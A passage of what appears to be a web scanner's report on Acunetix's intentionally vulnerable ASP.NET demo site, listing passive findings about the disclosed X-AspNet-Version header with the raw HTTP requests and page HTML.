href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/about.aspx
Method	GET
Parameter
Attack
Evidence	2.0.50727
Show / hide Request and Response
Request Header - size: 322 bytes.	GET http://testaspnet.vulnweb.com/about.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 14619
Response Body - size: 14,619 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>About</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="about.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMr7fvEMmSiYYPLDantQRZkqAblw" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/"> offices</A> in Malta, US and the UK. </P> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=0
Method	GET
Parameter
Attack
Evidence	2.0.50727
Show / hide Request and Response
Request Header - size: 330 bytes.	GET http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 13859
Response Body - size: 13,859 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk/TUy" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKDytHbBQKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBDelgcSNkQi9b3oGhQR0IdatoEdv" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a> <DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=2
Method	GET
Parameter
Attack
Evidence	2.0.50727
Show / hide Request and Response
Request Header - size: 330 bytes.	GET http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 14397
